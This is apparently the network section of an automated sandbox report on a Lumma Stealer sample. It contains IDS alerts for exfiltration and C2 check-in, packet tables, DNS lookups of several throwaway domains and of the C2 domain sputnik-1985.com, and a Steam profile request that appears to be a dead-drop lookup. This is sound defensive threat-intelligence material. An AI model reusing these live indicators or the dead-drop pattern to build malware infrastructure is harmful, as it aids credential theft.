2025-01-10T12:06:27.143705+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.64.1	443	TCP
2025-01-10T12:06:28.329583+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.64.1	443	TCP
2025-01-10T12:06:29.625250+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.64.1	443	TCP
2025-01-10T12:06:30.613387+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-10T12:06:31.813411+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49744	104.21.64.1	443	TCP
2025-01-10T12:06:32.305834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	104.21.64.1	443	TCP
2025-01-10T12:06:32.770493+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49745	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 12:06:22.002865076 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.002902031 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:22.003015995 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.006567955 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.006582022 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:22.661048889 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:22.661288977 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.666254044 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.666265965 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:22.666749954 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:22.712958097 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.715888023 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:22.759341002 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171643972 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171672106 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171724081 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.171741009 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171792984 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171832085 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.171832085 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.171842098 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171852112 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.171866894 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.171925068 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.261085033 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.261116028 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.261193991 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.261204004 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.261250973 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.261251926 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.266244888 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.266321898 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.270832062 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.270885944 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.270899057 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.270937920 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.270992041 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.271827936 CET	49737	443	192.168.2.4	104.102.49.254
Jan 10, 2025 12:06:23.271850109 CET	443	49737	104.102.49.254	192.168.2.4
Jan 10, 2025 12:06:23.284075975 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.284106016 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:23.284183025 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.284516096 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.284527063 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:23.770941973 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:23.771158934 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.773144960 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.773158073 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:23.773485899 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:23.774792910 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.774792910 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:23.774872065 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.232795954 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.232903957 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.233009100 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.233273983 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.233273983 CET	49738	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.233297110 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.233308077 CET	443	49738	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.240933895 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.240988016 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.241239071 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.241877079 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.241895914 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.707765102 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.707839966 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.709415913 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.709443092 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.710064888 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:24.711407900 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.711430073 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:24.711566925 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177026987 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177087069 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177115917 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177155018 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177186012 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177205086 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177244902 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.177244902 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.177273035 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.177292109 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.181757927 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.181793928 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.181813002 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.181819916 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.181830883 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.181875944 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.181885958 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.181946993 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.265364885 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.265511036 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.265575886 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.265714884 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.265747070 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.265786886 CET	49739	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.265798092 CET	443	49739	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.450849056 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.450891018 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.450978041 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.451575994 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.451595068 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.928354025 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.928436041 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.930336952 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.930362940 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.930663109 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.932349920 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.932712078 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.932744026 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:25.932801008 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:25.932816029 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:26.585578918 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:26.585685015 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:26.585777998 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:26.591375113 CET	49740	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:26.591396093 CET	443	49740	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:26.687400103 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:26.687432051 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:26.687542915 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:26.688009977 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:26.688021898 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.143632889 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.143704891 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.145124912 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.145132065 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.145462990 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.146766901 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.146882057 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.146904945 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.607758045 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.607886076 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.607994080 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.608179092 CET	49741	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.608192921 CET	443	49741	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.842983961 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.843029976 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:27.843108892 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.843508959 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:27.843521118 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.329323053 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.329582930 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.330821991 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.330840111 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.331127882 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.332590103 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.332847118 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.332882881 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.333015919 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.333024979 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.979715109 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.979805946 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:28.979868889 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.980334044 CET	49742	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:28.980355978 CET	443	49742	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.161921024 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.161950111 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.162059069 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.163033009 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.163044930 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.625171900 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.625250101 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.627389908 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.627397060 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.627603054 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:29.628902912 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.629019022 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:29.629021883 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.069155931 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.069256067 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.069462061 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.071332932 CET	49743	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.071343899 CET	443	49743	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.150538921 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.150593996 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.150796890 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.151360989 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.151376963 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.612080097 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.613387108 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.617372990 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.617386103 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.617650986 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:30.618944883 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.618944883 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:30.618964911 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:31.813221931 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:31.813293934 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:31.813349962 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:31.813570023 CET	49744	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:31.813585043 CET	443	49744	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:31.849026918 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:31.849046946 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:31.849170923 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:31.849608898 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:31.849622011 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.305438042 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.305834055 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.307130098 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.307146072 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.307359934 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.310524940 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.310524940 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.310585976 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.770330906 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.770433903 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.770634890 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.782382011 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.782382011 CET	49745	443	192.168.2.4	104.21.64.1
Jan 10, 2025 12:06:32.782407045 CET	443	49745	104.21.64.1	192.168.2.4
Jan 10, 2025 12:06:32.782419920 CET	443	49745	104.21.64.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 12:06:00.260647058 CET	49200	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:00.269191027 CET	53	49200	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.870440006 CET	51002	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.879566908 CET	53	51002	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.882584095 CET	64889	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.891345024 CET	53	64889	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.894226074 CET	60520	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.903135061 CET	53	60520	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.905518055 CET	61330	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.914936066 CET	53	61330	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.917167902 CET	54680	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.932107925 CET	53	54680	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.934811115 CET	64453	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.947910070 CET	53	64453	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.950790882 CET	50919	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.959995031 CET	53	50919	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.962805986 CET	53762	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.973184109 CET	53	53762	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.975795984 CET	53765	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.989090919 CET	53	53765	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:21.991847992 CET	64316	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:21.998331070 CET	53	64316	1.1.1.1	192.168.2.4
Jan 10, 2025 12:06:23.274111032 CET	62580	53	192.168.2.4	1.1.1.1
Jan 10, 2025 12:06:23.283212900 CET	53	62580	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 12:06:00.260647058 CET	192.168.2.4	1.1.1.1	0xfbc0	Standard query (0)	aGpUaEJqSGxZhd.aGpUaEJqSGxZhd	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.870440006 CET	192.168.2.4	1.1.1.1	0x8cba	Standard query (0)	ingreem-eilish.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.882584095 CET	192.168.2.4	1.1.1.1	0x279b	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.894226074 CET	192.168.2.4	1.1.1.1	0x58ed	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.905518055 CET	192.168.2.4	1.1.1.1	0xe293	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.917167902 CET	192.168.2.4	1.1.1.1	0x2318	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.934811115 CET	192.168.2.4	1.1.1.1	0x53fc	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.950790882 CET	192.168.2.4	1.1.1.1	0x9edd	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.962805986 CET	192.168.2.4	1.1.1.1	0xe191	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.975795984 CET	192.168.2.4	1.1.1.1	0xc69c	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.991847992 CET	192.168.2.4	1.1.1.1	0xb83e	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.274111032 CET	192.168.2.4	1.1.1.1	0x9994	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 12:06:00.269191027 CET	1.1.1.1	192.168.2.4	0xfbc0	Name error (3)	aGpUaEJqSGxZhd.aGpUaEJqSGxZhd	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.879566908 CET	1.1.1.1	192.168.2.4	0x8cba	Name error (3)	ingreem-eilish.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.891345024 CET	1.1.1.1	192.168.2.4	0x279b	Name error (3)	immureprech.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.903135061 CET	1.1.1.1	192.168.2.4	0x58ed	Name error (3)	deafeninggeh.biz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.914936066 CET	1.1.1.1	192.168.2.4	0xe293	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.932107925 CET	1.1.1.1	192.168.2.4	0x2318	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.947910070 CET	1.1.1.1	192.168.2.4	0x53fc	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.959995031 CET	1.1.1.1	192.168.2.4	0x9edd	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.973184109 CET	1.1.1.1	192.168.2.4	0xe191	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.989090919 CET	1.1.1.1	192.168.2.4	0xc69c	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:21.998331070 CET	1.1.1.1	192.168.2.4	0xb83e	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 12:06:23.283212900 CET	1.1.1.1	192.168.2.4	0x9994	No error (0)	sputnik-1985.com		104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sputnik-1985.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	104.102.49.254	443	4504	C:\Users\user\AppData\Local\Temp\19152\Appliance.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 11:06:22 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2025-01-10 11:06:23 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 10 Jan 2025 11:06:23 GMT Content-Length: 35126 Connection: close Set-Cookie: sessionid=73f5122b9b5bdf8cf1a4d449; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
